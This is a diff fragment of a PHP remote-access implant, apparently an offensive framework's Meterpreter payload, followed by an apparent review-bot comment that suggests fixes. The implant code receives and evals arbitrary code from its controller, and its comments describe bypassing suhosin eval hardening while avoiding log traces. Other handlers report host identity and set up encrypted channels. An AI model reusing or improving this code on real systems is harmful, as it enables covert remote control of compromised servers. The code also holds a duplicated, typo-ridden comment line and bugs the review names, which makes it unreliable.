if (!function_exists('core_loadlib')) {
register_command('core_loadlib', COMMAND_ID_CORE_LOADLIB);
function core_loadlib($req, &$pkt) {
global $id2f;
my_print("doing core_loadlib");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
}
$tmp = $commands;
$tmp = $id2f;
# We might not be able to use `eval` here because of some hardening
# (for example, suhosin), so we walk around by using `create_function` instead,
# but since this function is deprecated since php 7.2+, we're not using it
# but since this funcis deprecated since php 7.2+, we're not using it
# when we can avoid it, since it might leave some traces in the log files.
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
$suhosin_bypass=create_function('', $data_tlv['value']);
@ -433,33 +496,41 @@ function core_loadlib($req, &$pkt) {
} else {
eval($data_tlv['value']);
}
$new = array_diff($commands, $tmp);
foreach ($new as $meth) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
$new = array_diff($id2f, $tmp);
foreach ($new as $id => $func) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UINT, $id));
}
return ERROR_SUCCESS;
}
}
function core_enumextcmd($req, &$pkt) {
if (!function_exists('core_enumextcmd')) {
register_command('core_enumextcmd', COMMAND_ID_CORE_ENUMEXTCMD);
function core_enumextcmd($req, &$pkt) {
my_print("doing core_enumextcmd");
global $commands;
global $id2f;
$extension_name_tlv = packet_get_tlv($req, TLV_TYPE_STRING);;
$expected_ext_name = $extension_name_tlv['value'];
foreach ($commands as $ext_cmd) {
foreach ($id2f as $id => $ext_cmd) {
my_print("core_enumextcmd - checking " . $ext_cmd . " as " . $id);
list($ext_name, $cmd) = explode("_", $ext_cmd, 2);
if ($ext_name == $expected_ext_name) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, $cmd));
my_print("core_enumextcmd - adding " . $ext_cmd . " as " . $id);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UINT, $id));
}
}
return ERROR_SUCCESS;
}
}
function core_set_uuid($req, &$pkt) {
if (!function_exists('core_set_uuid')) {
register_command('core_set_uuid', COMMAND_ID_CORE_SET_UUID);
function core_set_uuid($req, &$pkt) {
my_print("doing core_set_uuid");
$new_uuid = packet_get_tlv($req, TLV_TYPE_UUID);
if ($new_uuid != null) {
@ -467,6 +538,7 @@ function core_set_uuid($req, &$pkt) {
my_print("New UUID is {$GLOBALS['UUID']}");
}
return ERROR_SUCCESS;
}
}
@ -481,7 +553,9 @@ function get_hdd_label() {
return "";
}
function core_negotiate_tlv_encryption($req, &$pkt) {
if (!function_exists('core_negotiate_tlv_encryption')) {
register_command('core_negotiate_tlv_encryption', COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION);
function core_negotiate_tlv_encryption($req, &$pkt) {
if (supports_aes()) {
my_print("AES functionality is supported");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256));
@ -503,14 +577,20 @@ function core_negotiate_tlv_encryption($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SYM_KEY, $GLOBALS['AES_KEY']));
}
return ERROR_SUCCESS;
}
}
function core_get_session_guid($req, &$pkt) {
if (!function_exists('core_get_session_guid')) {
register_command('core_get_session_guid', COMMAND_ID_CORE_GET_SESSION_GUID);
function core_get_session_guid($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SESSION_GUID, $GLOBALS['SESSION_GUID']));
return ERROR_SUCCESS;
}
}
function core_set_session_guid($req, &$pkt) {
if (!function_exists('core_set_session_guid')) {
register_command('core_set_session_guid', COMMAND_ID_CORE_SET_SESSION_GUID);
function core_set_session_guid($req, &$pkt) {
my_print("doing core_set_session_guid");
$new_guid = packet_get_tlv($req, TLV_TYPE_SESSION_GUID);
if ($new_guid != null) {
@ -518,9 +598,12 @@ function core_set_session_guid($req, &$pkt) {
my_print("New Session GUID is {$GLOBALS['SESSION_GUID']}");
}
return ERROR_SUCCESS;
}
}
function core_machine_id($req, &$pkt) {
if (!function_exists('core_machine_id')) {
register_command('core_machine_id', COMMAND_ID_CORE_MACHINE_ID);
function core_machine_id($req, &$pkt) {
my_print("doing core_machine_id");
if (is_callable('gethostname')) {
# introduced in 5.3
@ -541,12 +624,13 @@ function core_machine_id($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_MACHINE_ID, $serial.":".$machine_id));
return ERROR_SUCCESS;
}
##
# Channel Helper Functions
##
}
##
# Channel Helper Functions
##
$channels = array();
function register_channel($in, $out=null, $err=null) {
@ -769,7 +853,7 @@ function handle_dead_resource_channel($resource) {
# Notify the client that this channel is dead
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_close'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMMAND_ID, 'core_channel_close'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id()));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, $GLOBALS['UUID']));
@ -787,7 +871,7 @@ function handle_resource_read_channel($resource, $data) {
# Build a new Packet
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_write'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMMAND_ID, 'core_channel_write'));
if (array_key_exists((int)$resource, $udp_host_map)) {
list($h,$p) = $udp_host_map[(int)$resource];
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_HOST, $h));
@ -805,19 +889,21 @@ function handle_resource_read_channel($resource, $data) {
}
function create_response($req) {
global $id2f;
$pkt = pack("N", PACKET_TYPE_RESPONSE);
$method_tlv = packet_get_tlv($req, TLV_TYPE_METHOD);
my_print("method is {$method_tlv['value']}");
packet_add_tlv($pkt, $method_tlv);
$command_id_tlv = packet_get_tlv($req, TLV_TYPE_COMMAND_ID);
my_print("command id is {$command_id_tlv['value']}");
packet_add_tlv($pkt, $command_id_tlv);
$reqid_tlv = packet_get_tlv($req, TLV_TYPE_REQUEST_ID);
packet_add_tlv($pkt, $reqid_tlv);
if (is_callable($method_tlv['value'])) {
$result = $method_tlv['value']($req, $pkt);
$command_handler = $id2f[$command_id_tlv['value']];
if (is_callable($command_handler)) {
$result = $command_handler($req, $pkt);
} else {
my_print("Got a request for something I don't know how to handle (". $method_tlv['value'] ."), returning failure");
my_print("Got a request for something I don't know how to handle (" . $command_id_tlv['value'] . " / ". $command_handler ."), returning failure");
$result = ERROR_FAILURE;
}
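Review bot: The packets built in `handle_dead_resource_channel` and `handle_resource_read_channel` still put the string names `'core_channel_close'` and `'core_channel_write'` into `TLV_TYPE_COMMAND_ID`, which this commit defines as `TLV_META_TYPE_UINT | 1`; presumably `create_tlv` packs a UINT as a 32-bit integer, in which case a non-numeric string would be serialised as 0 (with a non-numeric-value warning on newer PHP) and the client would likely see an unknown command ID. They should be `packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_CLOSE));` and `packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMMAND_ID, COMMAND_ID_CORE_CHANNEL_WRITE));`, using the constants this commit adds. Two smaller points in the same file: `create_response` indexes `$id2f[$command_id_tlv['value']]` without checking the key exists, so an unregistered ID from the client raises an undefined-index notice before reaching the failure branch (`$command_handler = isset($id2f[$id]) ? $id2f[$id] : null;` avoids it), and `register_command` tests `in_array($i, $id2f)`, which searches the handler names (values) rather than the ID keys, so the duplicate check never fires — `!isset($id2f[$i])` or `array_key_exists` is what was meant. The comment edit in `core_loadlib` also introduces the typo `funcis` for `function is`.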